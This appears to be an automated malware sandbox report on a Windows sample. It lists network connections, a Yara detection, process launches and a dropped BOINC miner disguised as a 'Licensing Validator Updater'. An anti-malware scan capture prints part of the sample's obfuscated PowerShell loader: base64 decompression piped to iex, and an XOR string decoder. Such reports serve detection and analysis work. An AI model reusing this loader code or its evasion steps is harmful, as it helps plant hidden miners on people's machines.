Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.16:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.16:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.16:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.16:49750 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.16:49755 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.16:49757 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.16:49756 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.16:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.16:49775 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.16:49786 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.129.91:443 -> 192.168.2.16:49787 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.16:49788 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.16:49789 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.16:49791 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.16:49790 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.16:49794 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.16:49797 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.149.100.209:443 -> 192.168.2.16:49798 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.16:49805 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.16:49806 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.16:49803 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.16:49804 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.16:49801 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.16:49802 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.16:49807 version: TLS 1.2
Source: unknownHTTPS traffic detected: 34.120.208.123:443 -> 192.168.2.16:49808 version: TLS 1.2
Source: unknownHTTPS traffic detected: 208.68.240.115:443 -> 192.168.2.16:49814 version: TLS 1.2
Source: unknownHTTPS traffic detected: 208.68.240.115:443 -> 192.168.2.16:49817 version: TLS 1.2
Source: unknownHTTPS traffic detected: 208.68.240.115:443 -> 192.168.2.16:49823 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_5500.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Powershell drops PE file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe (copy)Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Licensing Validator Updater\boinc.exeJump to dropped file
Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00000271256F2377 NtQuerySystemInformation,8_2_00000271256F2377
Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_0000027126404F32 NtQuerySystemInformation,8_2_0000027126404F32
Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_00000271256F23778_2_00000271256F2377
Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_0000027126404F328_2_0000027126404F32
Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_0000027126404F728_2_0000027126404F72
Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 8_2_000002712640565C8_2_000002712640565C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFEB363580F35_2_00007FFEB363580F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFEB363C6EB35_2_00007FFEB363C6EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFEB36365F435_2_00007FFEB36365F4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFEB36355CE35_2_00007FFEB36355CE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 35_2_00007FFEB379510335_2_00007FFEB3795103
Source: amsi64_5500.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: powershell.exe, 00000023.00000002.2227525069.000001A703926000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBPf
Source: classification engineClassification label: mal80.evad.winZIP@59/102@76/18
Source: C:\Program Files\Mozilla Firefox\firefox.exeFile created: C:\Users\user\AppData\Local\Mozilla\Firefox\SkeletonUILock-c388d246Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2140:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4104:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_762381681
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeMutant created: \Sessions\1\BaseNamedObjects\Global\BoincSingleInstance
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1228:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:852:120:WilError_03
Source: C:\Program Files\Mozilla Firefox\firefox.exeFile created: C:\Users\user\AppData\Local\Temp\firefoxJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress) $p42eckaqj80s7wl.CopyTo( $a190kdrcwshytln ) $p42eckaqj80s7wl.Close()$lhwtypigdmu7rje.Close()[byte[]] $ahvjsux0dnb9fkl = $a190kdrcwshytln.ToArray() $v7ejq6u4ylb92nt=$ahvjsux0dnb9fkl return $v7ejq6u4ylb92nt}[byte[]]$lmv45ekn2rs19pa=poq4wxgrfdjtc2b1ka6n03mv7lu $no768xrud1w2bsz[System.Text.Encoding]::ascii.GetString((poq4wxgrfdjtc2b1ka6n03mv7lu "Z+U6ZnA4aGN2ZfIhowDpXmBFNmCMYiUcuJiUFOMOIdR/mff86xYjURnUhk5/Zz1tMcIbNDtq1se62ogn2hLfJWsb3q9rePlEC1Zk2yb/P/f5pVde8GBrUhZB8HCAyDlUgPljI6Nui47JAavVNHEtqoOXnK5Zty+2XFxe8Sk1JYBO7E6e6unTJGtwU0Dq/ik4fFxWRA7EmOKY5da5bfaB43Hlmlt5xl9uc57o8PJ9CXIbXDuVuxH2BYrPGPI+2NFUKwKHI5V/3n9o4EzaUoFu7FkQ63rlL8EQLK3DxzvhLgxJ5EhivyiQB7q2f0UOcnoRhIb1c594UyPUl1/W/2bmDjVqCWrskpRPsuD1mu1E1/t2fb5IWVWZWEcDBFluIQvla7wUDVUTOZS3soAURsvjvYTw1PxKsYqiertHFfmO9dbF0uaIxdQOCoNFTJ0K6yNdiOlftrcVqM6JkpFBm+trEBoqqw0/C21iQ+K5Kwaz2kYMlvngrTlFnyKAH9rOs6poDQtH7YP7kthw9kzGfMPlOJqjj9Zd0cbrrwXtrDDNAidO8f6ezvRxf+khPSOcl1YQQq8vr5cUzIu6g0ylxA8zbh0vl8cKR862dvtTA7OFp1TVjrjwaIq6UyJsADkgTTKdXjfACXRwIYebfTNgHZTFMvQKTZ3ybPGRUVfyLUoXRuxCfta10IUqWdzllDtYrM8+MLlZ5uhGyPqXJ9jjTxfHPEoxcRnYLZ3SsOkL8rpf4be091FdP+Rqm9JuAyHqPDt0nUgr5OpaSQ9Sq2zCtZh9jXgAawJ2KMacMAK6vxtOGNYryk4/nXpO4CUbzckjCheAndl8wH+EKmEVY5Jh4kSXHS7f8QY3HeHLudnQLvOfu6BR/e9AMnGOqdiLEgRW+NAnvX6rhbALoO6KEtHh5rPyRU5OVORvaYUgJktECKmefp18JzARxMhTjv8ucXPtD2qe4EG6gazm16aD/wF9zChFEl4hbz422fQNlQ8ZnF/zSi+yJrbsY+u0fLkzzkMyckktXaNloiX6A0ByvEvpNUYkC6XlijtAdL8lA/aCjPnf5gqR0dMa7xK2/080emsBa4b/kue5ns0B8qByPNEXdevKGTkNqYFeHEmOaZFmowlSg4+LG2/xfqdhRvWudM+KB1v7bOVRNq/j1mmL0kW3svAotMKW0yNF026Gl08xpVz7VlUhKE5QVeUDBFk0W0l4OkUaNWC8CtmSyZdZjG4ad8N7lm/PSUll/6dj/POTEIXW9FM/NZ3vYupUxm1jnO0zyJ0MDMUqGFJhpoYeDc9FhYZk+iUIrNwygmr6tJTjc4YdNuzvyX/pUy6nLfZWHzbuUltJE8n94/ym/OSOL63vu72yVJtIQqkxWfe49B9oaN6Nqx685O24oU5kMDEJb2kdW/IUmMd4yw6iFw1yPY1VlVRA/ffnEzm7lC2DA+YrCN4Oo+nHSQovYbudGsHM5gyBW8VsqRTX+JiFDcjkKKSNkk6Db+qErv3hsiHbllaD9WdahI+Y/KiMm9IdYHfDk+A92Ozcy635raPGlq5e3d35h5fJmiMXmDX9AZItXgmSEnKke+KUjQRql/r+lrFSOW5oqtQMmGnDLc6FEaXCnL/RE/JtrWncsaIlmdHOWYPOnU/EWlOp+213eA=="))|iex;function sdifbiudu { param($37hbifps61xuja2, $method) $saguhga = [System.Text.Encoding]::ascii.GetBytes("lidfghbne") if ($method -eq "is8dyhv"){ $37hbifps61xuja2 = [System.Text.Encoding]::ascii.GetString([System.Convert]::FromBase64String($37hbifps61xuja2)) } $hsevi6ytd7f4pl5 = [System.Text.Encoding]::ascii.GetBytes($37hbifps61xuja2) $irugha4 = $(for ($z0ugfp6bl7o9ykc = 0; $z0ugfp6bl7o9ykc -lt $hsevi6ytd7f4pl5.length; ) { for ($0njz6lvaf3m5t9k = 0; $0njz6lvaf3m5t9k -lt $saguhga.length; $0njz6lvaf3m5t9k++) { $hsevi6ytd7f4pl5[$z0ugfp6bl7o9ykc] -bxor $saguhga[$0njz6lvaf3m5t9k] $z0ugfp6bl7o9ykc++ if ($z0ugfp6bl7o9ykc -ge $hsevi6ytd7f4pl5.Length) { $0njz6lvaf3m5t9k = $saguhga.length } } }) $irugha4 = [System.Text.Encoding]::ascii.GetString($irugha4) return $irugha4}function Install{$fldopt=('Software Publis
Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1616308895.000001CA1B229000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1602788481.000001CA1B2C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1640176486.000001CA1B2C1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1527224774.000001CA1B2BF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT * FROM events WHERE timestamp BETWEEN date(:dateFrom) AND date(:dateTo);
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO events (type, count, timestamp) VALUES (:type, 1, date(:date));resource:///modules/urlbar/private/QuickSuggestRemoteSettings.sys.mjs
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1616308895.000001CA1B229000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: INSERT INTO events (type, count, timestamp) VALUES (:type, 1, date(:date));
Source: firefox.exe, 00000003.00000003.1616308895.000001CA1B229000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.2027390218.000001CA0CE6F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE events (id INTEGER PRIMARY KEY, type INTEGER NOT NULL, count INTEGER NOT NULL, timestamp DATE );
Source: firefox.exe, 00000003.00000003.1616308895.000001CA1B229000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT timestamp FROM events ORDER BY timestamp ASC LIMIT 1;;
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1639830087.000001CA1B2E7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1724752493.000001CA0C7C9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1527012027.000001CA1B2E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT sum(count) FROM events;
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT timestamp FROM events ORDER BY timestamp ASC LIMIT 1;
Source: firefox.exe, 00000003.00000003.1616308895.000001CA1B229000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT timestamp FROM events ORDER BY timestamp ASC LIMIT 1;;Fy6
Source: firefox.exe, 00000003.00000003.1616308895.000001CA1B229000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE events SET count = count + 1 WHERE id = :id;-
Source: firefox.exe, 00000003.00000003.1616308895.000001CA1B229000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT sum(count) FROM events;9'
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: UPDATE events SET count = count + 1 WHERE id = :id;
Source: firefox.exe, 00000003.00000003.2026626662.000001CA0CE9B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000003.00000003.1616308895.000001CA1B229000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT * FROM events WHERE type = :type AND timestamp = date(:date);
Source: firefox.exe, 00000003.00000003.1616308895.000001CA1B229000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT sum(count) FROM events;9
Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknownProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe"
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1976,i,16268402640929927935,18277506038604385706,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2252 -prefMapHandle 2248 -prefsLen 25250 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7aecee2f-7929-4b59-a925-084c7a102dc1} 876 "\\.\pipe\gecko-crash-server-pipe.876" 1ca7b26d510 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3848 -parentBuildID 20230927232528 -prefsHandle 2524 -prefMapHandle 2520 -prefsLen 25402 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a34be315-eacf-430b-91ce-f68b9a07f9bb} 876 "\\.\pipe\gecko-crash-server-pipe.876" 1ca0b1e6b10 rdd
Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5460 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5388 -prefMapHandle 5424 -prefsLen 33076 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {12e0202d-ddff-4bd9-9b19-74adcc901a75} 876 "\\.\pipe\gecko-crash-server-pipe.876" 1ca1b118b10 utility
Source: unknownProcess created: C:\Program Files\7-Zip\7zG.exe "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\527\" -spe -an -ai#7zMap22896:62:7zEvent18695
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /run /tn CleanUpMgrTask_1659166102
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe "C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe" --detach_console
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeProcess created: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe "C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe" -detach_phase_two
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-ItemProperty -Path "HKCU:\Software\Microsoft" -Name ExpirienceHost -Value 1
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeProcess created: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe "C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe" --detect_gpus --dir "C:\Users\user\AppData\Roaming\Licensing Validator Updater"
Source: C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ep Unrestricted
Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe"Jump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2304 -parentBuildID 20230927232528 -prefsHandle 2252 -prefMapHandle 2248 -prefsLen 25250 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7aecee2f-7929-4b59-a925-084c7a102dc1} 876 "\\.\pipe\gecko-crash-server-pipe.876" 1ca7b26d510 socketJump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3848 -parentBuildID 20230927232528 -prefsHandle 2524 -prefMapHandle 2520 -prefsLen 25402 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a34be315-eacf-430b-91ce-f68b9a07f9bb} 876 "\\.\pipe\gecko-crash-server-pipe.876" 1ca0b1e6b10 rddJump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5460 -parentBuildID 20230927232528 -sandboxingKind 0 -prefsHandle 5388 -prefMapHandle 5424 -prefsLen 33076 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {12e0202d-ddff-4bd9-9b19-74adcc901a75} 876 "\\.\pipe\gecko-crash-server-pipe.876" 1ca1b118b10 utilityJump to behavior
Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknownJump to behavior
